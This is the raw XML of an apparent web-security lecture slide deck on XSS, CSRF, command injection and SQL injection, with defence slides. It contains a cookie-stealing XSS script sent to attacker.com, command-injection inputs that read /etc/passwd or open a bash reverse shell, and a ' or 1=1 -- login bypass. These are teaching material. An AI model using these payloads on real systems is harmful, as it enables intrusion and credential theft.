          <a:xfrm rot="1101636">
            <a:off x="3044825" y="3138488"/>
            <a:ext cx="2570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user clicks on link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 rot="1122022">
            <a:off x="3300413" y="3817938"/>
            <a:ext cx="3000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victim echoes user input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3257550"/>
            <a:ext cx="5021263" cy="16192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457200" y="4514850"/>
            <a:ext cx="5334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B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>www.victim.com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3900" y="2057400"/>
            <a:ext cx="44577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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>www.evil.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="B7C1EB"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRP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457200" y="4819650"/>
            <a:ext cx="5334000" cy="1962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&lt;html&gt;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Results for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&lt;script&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>?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... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ...) 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  &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/html&gt;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33900" y="2362200"/>
            <a:ext cx="4457700" cy="64611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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>search.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200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term= &lt;script&gt; ... &lt;/script&gt;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1882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0191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49799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1905000"/>
            <a:ext cx="2436812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1524000"/>
            <a:ext cx="169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62600" y="4552950"/>
            <a:ext cx="1760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rot="5400000">
            <a:off x="5576887" y="3652838"/>
            <a:ext cx="1801813" cy="15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38862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6781800" y="3276600"/>
            <a:ext cx="1720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Inject malicious script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="39624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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3036888" y="4067175"/>
            <a:ext cx="2141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request content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 rot="1122022">
            <a:off x="2311400" y="456882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receive malicious script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750050" y="28654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1</a:t>
            </a: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 rot="1039646">
            <a:off x="2713038" y="3703638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2</a:t>
            </a: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 rot="1068865">
            <a:off x="2084388" y="40862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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4324350"/>
            <a:ext cx="3352800" cy="116205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/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="2205038"/>
            <a:ext cx="3211512" cy="6873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0" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2759075" y="2060575"/>
            <a:ext cx="230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0458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>steal valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-713606">
            <a:off x="2438400" y="235902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40458C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89544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Stored XSS attack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loaded images</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>user content (comments, blog posts)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1203394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XSS attacks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4572000" cy="14851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95591"/>
            <a:ext cx="2441443" cy="2441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60" y="1524001"/>
            <a:ext cx="2987040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4" y="4135826"/>
            <a:ext cx="4953014" cy="240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37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Validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP-Only Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic Data Tainting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Static Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Script Sandboxing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2911840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 (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 18" descr="toshiba_satellite_a105_s4284_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87" y="3103563"/>
            <a:ext cx="1436688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CompaqAlphaServerES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2084388"/>
            <a:ext cx="115570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7" y="5402263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943600" y="5021263"/>
            <a:ext cx="16938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Attack Server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784850" y="1657350"/>
            <a:ext cx="1760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Server Victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2657475" y="2486025"/>
            <a:ext cx="2830512" cy="6175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11187" y="447675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rgbClr val="660066"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>User Victim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 rot="-709076">
            <a:off x="2994025" y="2298700"/>
            <a:ext cx="2068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establish session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2058987" y="4800600"/>
            <a:ext cx="2906713" cy="10668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3" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2886075" y="3014663"/>
            <a:ext cx="244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send forged request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2505075" y="4191000"/>
            <a:ext cx="2830512" cy="990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TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3241675" y="4527550"/>
            <a:ext cx="307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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>visit server 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(or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a: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)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2427287" y="4930775"/>
            <a:ext cx="2932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receive malicious page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2608262" y="2530475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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2989262" y="39624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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2182812" y="438785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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Arrow Connector 23"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2668587" y="3192463"/>
            <a:ext cx="2830513" cy="61753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Oval 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2439987" y="3352800"/>
            <a:ext cx="365125" cy="3651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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>4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 rot="-743562">
            <a:off x="4252912" y="3325813"/>
            <a:ext cx="12128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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>(w/ cookie)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1747236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CSRF Defenses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Secret Validation Token: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Referrer Validation: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Custom HTTP Header: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User Interaction (e.g., CAPTCHA)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18125" y="6145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solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128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4114800" y="2438400"/>
            <a:ext cx="4133850" cy="457200"/>
            <a:chOff x="2832" y="1008"/>
            <a:chExt cx="2604" cy="288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2832" y="1008"/>
              <a:ext cx="2544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832" y="1035"/>
              <a:ext cx="2604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&lt;input type=hidden value=23a3af01b&gt;</a:t>
              </a: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114800" y="4038600"/>
            <a:ext cx="4953000" cy="457200"/>
            <a:chOff x="2832" y="2050"/>
            <a:chExt cx="2986" cy="288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2832" y="2050"/>
              <a:ext cx="2880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32" y="2078"/>
              <a:ext cx="298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Referrer: http://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www.facebook.com</a:t>
              </a:r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/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home.php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4114800" y="5334000"/>
            <a:ext cx="3568700" cy="457200"/>
            <a:chOff x="2832" y="3051"/>
            <a:chExt cx="2248" cy="288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832" y="3051"/>
              <a:ext cx="220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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128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2832" y="3078"/>
              <a:ext cx="22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X-Requested-By: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>XMLHttpRequest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  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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943350"/>
            <a:ext cx="15240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105400"/>
            <a:ext cx="10287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2700" y="2247900"/>
            <a:ext cx="8001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031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905D-903D-3542-B552-FB7BC97B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up the Network Stack…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9A424F-0B06-1646-B0AB-CCD11D6662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2061207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97AA5-0703-3340-A49F-601B313B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Injection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A6B1-8D14-AC46-83D8-638A02227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 issue: exporting local execution capability via Web interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Request:http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vulnsite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ping?host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=8.8.8.8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Executes: ping –c 2 8.8.8.8 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simple command injection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Request: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vulnsite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ping?host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=8.8.8.8;cat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Executes: ping –c 2 8.8.8.8;cat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Outputs ping output and the contents of “/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” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Getting sneakier…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ping –c 2 8.8.8.8|cat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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ping –c 2 8.8.8.8&amp;cat$IFS$9/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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ping –c 2 $(cat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passwd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ping –c 2 &lt;(bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/10.0.0.1/443 0&gt;&amp;1)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17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Injection is another example of code injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adversary exploits user-controlled input to change meaning of database command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2629637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0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Server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463800"/>
            <a:ext cx="139541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Browser</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>(Client)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2037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/>
              <a:t>DB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33563" y="3643312"/>
            <a:ext cx="12985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866900" y="4652962"/>
            <a:ext cx="11811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12925" y="2438400"/>
            <a:ext cx="13414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Enter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Password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6263" y="2532062"/>
            <a:ext cx="3025774" cy="152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1" dirty="0"/>
              <a:t>SELECT * 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FROM Users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WHERE user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'me</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>'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 err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>'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386263" y="4076879"/>
            <a:ext cx="302577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10800000">
            <a:off x="4386264" y="4435474"/>
            <a:ext cx="305911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379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11500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Server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463800"/>
            <a:ext cx="139541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/>
              <a:t>Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Browser</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>(Client)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412037" y="2463800"/>
            <a:ext cx="1274763" cy="24066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200" b="1"/>
              <a:t>DB</a:t>
            </a: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833563" y="3643312"/>
            <a:ext cx="1298575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1866900" y="4652962"/>
            <a:ext cx="11811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12925" y="2438400"/>
            <a:ext cx="1341438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/>
              <a:t>Enter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Password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86263" y="2532062"/>
            <a:ext cx="3025774" cy="15286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1" dirty="0"/>
              <a:t>SELECT * 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FROM Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>WHERE user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'me</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>'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386263" y="4076879"/>
            <a:ext cx="302577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rot="10800000">
            <a:off x="4386264" y="4435474"/>
            <a:ext cx="305911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38907" y="5562600"/>
            <a:ext cx="5266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if user = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>'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</a:rPr>
              <a:t>or 1=1 --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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr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00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SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in the Wild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09950"/>
            <a:ext cx="6096000" cy="2552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0"/>
            <a:ext cx="3175000" cy="2171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8" y="2286000"/>
            <a:ext cx="3598672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18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Defenses Against SQL Injection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Prepared Statements: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String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request.getParameter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("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customerName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"); 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// perform input validation to detect attacks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String query = "SELECT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account_balance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FROM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user_data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WHERE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user_name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 ? ";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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</a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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PreparedStatement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pstmt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connection.prepareStatement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query );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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pstmt.setString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( 1,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custname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); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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ResultSet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 results = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>pstmt.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>( );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Input Validation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="American Typewriter" charset="0"/>
                <a:cs typeface="American Typewriter" charset="0"/>
              </a:rPr>
              <a:t>Case statements, cast to non-string type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Escape User-supplied inputs:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="American Typewriter" charset="0"/>
                <a:cs typeface="American Typewriter" charset="0"/>
              </a:rPr>
              <a:t>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3713227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8229600" cy="2533135"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2554355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BC6278-39AD-C945-AFE0-A09F210C0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what's the take away…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0392934-4C02-BD49-BB14-BB72B1D17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5" r="3471" b="10565"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1524000"/>
            <a:ext cx="914400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09E11B-6022-764C-943E-114715A08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97490"/>
            <a:ext cx="3321050" cy="2089150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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5AD6B6C-3F31-0045-89B7-F8E52691F64D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5602941" y="4038600"/>
          <a:ext cx="392205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4057B62E-120D-F04C-B6DA-40A07C999D41}"/>
              </a:ext>
            </a:extLst>
